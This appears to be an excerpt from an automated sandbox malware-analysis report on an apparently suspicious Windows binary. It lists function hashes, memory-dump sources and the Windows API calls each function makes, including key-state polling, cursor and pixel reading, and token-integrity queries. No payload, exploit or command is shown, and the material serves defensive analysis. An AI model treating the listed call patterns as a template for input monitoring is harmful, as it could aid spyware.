                                                              • Opcode ID: a6925dc272e20e3238a8171554a0ce3317f58012887cd452ed280457212aeae4
                                                              • Instruction ID: 27993ea3561837f71a0ad3d10c0313c2dcab182e1534a19e54d60a523204698c
                                                              • Opcode Fuzzy Hash: a6925dc272e20e3238a8171554a0ce3317f58012887cd452ed280457212aeae4
                                                              • Instruction Fuzzy Hash: 42511A35A00109DFCB01EF64C991AADBBF5EF49324F1480AAE809AB361CB35ED51EF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47e566726428c0d5003e6ccc95eba1ed283ac3e448e7f0fba538aca414422c62
                                                              • Instruction ID: e2b68fba480a82ab0bece17f2b96b4ab06d5aeb00d0b6ad44947d47c3f9b6673
                                                              • Opcode Fuzzy Hash: 47e566726428c0d5003e6ccc95eba1ed283ac3e448e7f0fba538aca414422c62
                                                              • Instruction Fuzzy Hash: EC41C435D05118AFEF24DF28CC48FA9BBA5EB09320F150166F915A72E1C7309D95FE91
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00F12357
                                                              • ScreenToClient.USER32(00FD57B0,?), ref: 00F12374
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00F12399
                                                              • GetAsyncKeyState.USER32(00000002), ref: 00F123A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: b900068de76a1649955b96cb3ab7c41910282eda12fab9a404c8215e2e2b4e85
                                                              • Instruction ID: b308e044950c83b5f5388ddf326256004c1423938bb5d859fe6acc9daf6ef71f
                                                              • Opcode Fuzzy Hash: b900068de76a1649955b96cb3ab7c41910282eda12fab9a404c8215e2e2b4e85
                                                              • Instruction Fuzzy Hash: 23416135904109FBDF599FA8CC44AEDBB74BB05370F204316E829D21A0CB3499A4FBA1
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F663E7
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00F66433
                                                              • TranslateMessage.USER32(?), ref: 00F6645C
                                                              • DispatchMessageW.USER32(?), ref: 00F66466
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F66475
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                              • String ID:
                                                              • API String ID: 2108273632-0
                                                              • Opcode ID: f4097d3c000acbe3bc3c9e421b31088fffd0c8cc09eb6a568d485f700e6a4104
                                                              • Instruction ID: 5c305a435701570d0b8e44a0a477a04f118681d58eb937512db0ca3155934455
                                                              • Opcode Fuzzy Hash: f4097d3c000acbe3bc3c9e421b31088fffd0c8cc09eb6a568d485f700e6a4104
                                                              • Instruction Fuzzy Hash: 0831B431D0164AAFDB24CFB1DC45BF67BBDAB01721F140266E425C72A1EB359889F760
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00F68A30
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00F68ADA
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F68AE2
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00F68AF0
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F68AF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: bfe1c45ae4f0766b553cc424ac99e5100eb08b860d21faf799676202dbb6fb2e
                                                              • Instruction ID: e16d50760d7b76768ed4161584dcbe490f2ceab447426deb64810822078d5f10
                                                              • Opcode Fuzzy Hash: bfe1c45ae4f0766b553cc424ac99e5100eb08b860d21faf799676202dbb6fb2e
                                                              • Instruction Fuzzy Hash: 3931DC71900219EBDF14CFA8D94CA9E3BB5EB04325F10822AF925EA2D1C7B49955EB90
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00F6B204
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F6B221
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F6B259
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F6B27F
                                                              • _wcsstr.LIBCMT ref: 00F6B289
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: 156c85b31b8d31ed05df27099d0bf7ebbd0797dc40ba055add92d59c9ed1646d
                                                              • Instruction ID: 9926e5c46cabb0940458485236f2086eda8806de96146997820ab97ef0f5e180
                                                              • Opcode Fuzzy Hash: 156c85b31b8d31ed05df27099d0bf7ebbd0797dc40ba055add92d59c9ed1646d
                                                              • Instruction Fuzzy Hash: 1421F5326042057BEB169B759C59E7F7BDCDF49720F00413AF805DA161EF659C80B260
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F9B192
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F9B1B7
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F9B1CF
                                                              • GetSystemMetrics.USER32(00000004), ref: 00F9B1F8
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F80E90,00000000), ref: 00F9B216
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 2294984445-0
                                                              • Opcode ID: 41ef8590e59064780d6405c3f3cffeefe8f42cbb13b272e6a161adec64aa151d
                                                              • Instruction ID: 102e42746d35e1a9abe43fd61bfae020afa9a05be50b0ad90d68dae38d055fbb
                                                              • Opcode Fuzzy Hash: 41ef8590e59064780d6405c3f3cffeefe8f42cbb13b272e6a161adec64aa151d
                                                              • Instruction Fuzzy Hash: EA218072A10255AFDF209F38ED44B6A37A4EB05731F154729F922D71E0D7309864EB90
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F69320
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F69352
                                                              • __itow.LIBCMT ref: 00F6936A
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F69392
                                                              • __itow.LIBCMT ref: 00F693A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow$_memmove
                                                              • String ID:
                                                              • API String ID: 2983881199-0
                                                              • Opcode ID: 1959ba4f5183cea9f48532da147764441de4bdb75bd0e2ba08bbeb4d8d951b04
                                                              • Instruction ID: 852fbb90a42558db4e2be80a72b96bc8605e8fda6fd118081e3a3744802c6aaf
                                                              • Opcode Fuzzy Hash: 1959ba4f5183cea9f48532da147764441de4bdb75bd0e2ba08bbeb4d8d951b04
                                                              • Instruction Fuzzy Hash: D521C531B08308BBDB10ABA49D86EEE7BBDEB48720F045025F905DB2D1D6B4CD55B791
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00F85A6E
                                                              • GetForegroundWindow.USER32 ref: 00F85A85
                                                              • GetDC.USER32(00000000), ref: 00F85AC1
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00F85ACD
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00F85B08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: 619bbebc87b5a25123aeaf194b448e9753cc68bdcf5694e07ba645790f1ade92
                                                              • Instruction ID: 1807c3cdc01547faa1b82d94a235e6e08f2635490adfb734ce0a23893e0995af
                                                              • Opcode Fuzzy Hash: 619bbebc87b5a25123aeaf194b448e9753cc68bdcf5694e07ba645790f1ade92
                                                              • Instruction Fuzzy Hash: 01219635A00208AFD714EF65DC88A9AB7E5EF48750F14C479F809D7361CA74AD45EB90
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F1134D
                                                              • SelectObject.GDI32(?,00000000), ref: 00F1135C
                                                              • BeginPath.GDI32(?), ref: 00F11373
                                                              • SelectObject.GDI32(?,00000000), ref: 00F1139C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: 7e42aa9baa843bf750f7121a546be41cdfabce8d45fb7b9d253b64dd7d1fec23
                                                              • Instruction ID: 0ecd9fbe517d43071d5d2b901984ef7199361b289122ff2b1d4e31f8ed847308
                                                              • Opcode Fuzzy Hash: 7e42aa9baa843bf750f7121a546be41cdfabce8d45fb7b9d253b64dd7d1fec23
                                                              • Instruction Fuzzy Hash: 1121573180160CEBDB119F25EC087A97BAAFB10B22F184227E920961B4D77198A5FF90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: e375f38913a52f745f24d78ea351a7643ca33dc75436f5d42f5598655e202e32
                                                              • Instruction ID: d7b89293daf363d7efc99446172973dd321c31078b2089a4b7adddf432c06e9d
                                                              • Opcode Fuzzy Hash: e375f38913a52f745f24d78ea351a7643ca33dc75436f5d42f5598655e202e32
                                                              • Instruction Fuzzy Hash: F301B5B27001157BD204AB19AD42FBBB36CEE523B8F044021FE05D7242EB65EF50B2A1
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00F74ABA
                                                              • __beginthreadex.LIBCMT ref: 00F74AD8
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00F74AED
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F74B03
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F74B0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                              • String ID:
                                                              • API String ID: 3824534824-0
                                                              • Opcode ID: 44026468eaefd2afe658c61fca3f53c20d2366335960124255f690d7ab2f1bf5
                                                              • Instruction ID: 89cfc351847bb1943c304431793899b6e68484e135666ac43ca32f32972d9a33
                                                              • Opcode Fuzzy Hash: 44026468eaefd2afe658c61fca3f53c20d2366335960124255f690d7ab2f1bf5
                                                              • Instruction Fuzzy Hash: 9B110876D0521CBBC7019FB8AC04A9B7FADEB45321F148267F818D3250D775DD48ABA1
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F6821E
                                                              • GetLastError.KERNEL32(?,00F67CE2,?,?,?), ref: 00F68228
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00F67CE2,?,?,?), ref: 00F68237
                                                              • HeapAlloc.KERNEL32(00000000,?,00F67CE2,?,?,?), ref: 00F6823E
                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F68255
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: 69ff95ccd56884b58960b4a171b25561c99d764f8bc055a6ed08e194b536c9ab
                                                              • Instruction ID: b09a0d0c3b03e442364c02c329a5b181916a18ad797ac07bad657cd6793e1811
                                                              • Opcode Fuzzy Hash: 69ff95ccd56884b58960b4a171b25561c99d764f8bc055a6ed08e194b536c9ab
                                                              • Instruction Fuzzy Hash: 710181B1604208FFDB204FA5DC48D6B7FACEF8A7A5B50052EF809C3220DB318C45EA60
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?,?,?,00F67455), ref: 00F67127
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?,?), ref: 00F67142
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?,?), ref: 00F67150
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?), ref: 00F67160
                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?,?), ref: 00F6716C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: a85b8fe8a99827c63ebfafeb1263113cf154c7736b8122d83e44d4c894725cf4
                                                              • Instruction ID: 3713f6f4ef50080eec5daa91742e7acf91c94f49f35ad0d03530d3c7fb1a9612
                                                              • Opcode Fuzzy Hash: a85b8fe8a99827c63ebfafeb1263113cf154c7736b8122d83e44d4c894725cf4
                                                              • Instruction Fuzzy Hash: BD018FB2A01308BBDB115F64DC44BAA7BADEF457A5F140166FD08D2220D771DD41ABA0
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F75260
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F7526E
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F75276
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F75280
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F752BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 06b90b73c6fd3937ddf3cca75590a62ce5734b30335714a72300892f1e6ca6c0
                                                              • Instruction ID: 0bb1bf1abc555306f1707c0c665b37d170d81f5aac42f2d7ab2be086dc228dc2
                                                              • Opcode Fuzzy Hash: 06b90b73c6fd3937ddf3cca75590a62ce5734b30335714a72300892f1e6ca6c0
                                                              • Instruction Fuzzy Hash: 59015B31D01A1DDBCF00EFE4D8486EDBB78BB09B11F404157E945F2142DB709554E7A6
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F68121
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F6812B
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F6813A
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F68141
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F68157
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: e68183510098d895fd2366652b22101a60d73f0f3bed4fc263e61978d03ccc40
                                                              • Instruction ID: 1e184b55bfc4ec9cccf87b82cb6139c25adb958758bfdd83ec8363628e021ccb
                                                              • Opcode Fuzzy Hash: e68183510098d895fd2366652b22101a60d73f0f3bed4fc263e61978d03ccc40
                                                              • Instruction Fuzzy Hash: DFF06871600308BFDB210F65DC99E673BACFF467A8B10012AF545C6160CB619D86FA60
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00F6C1F7
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F6C20E
                                                              • MessageBeep.USER32(00000000), ref: 00F6C226
                                                              • KillTimer.USER32(?,0000040A), ref: 00F6C242
                                                              • EndDialog.USER32(?,00000001), ref: 00F6C25C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
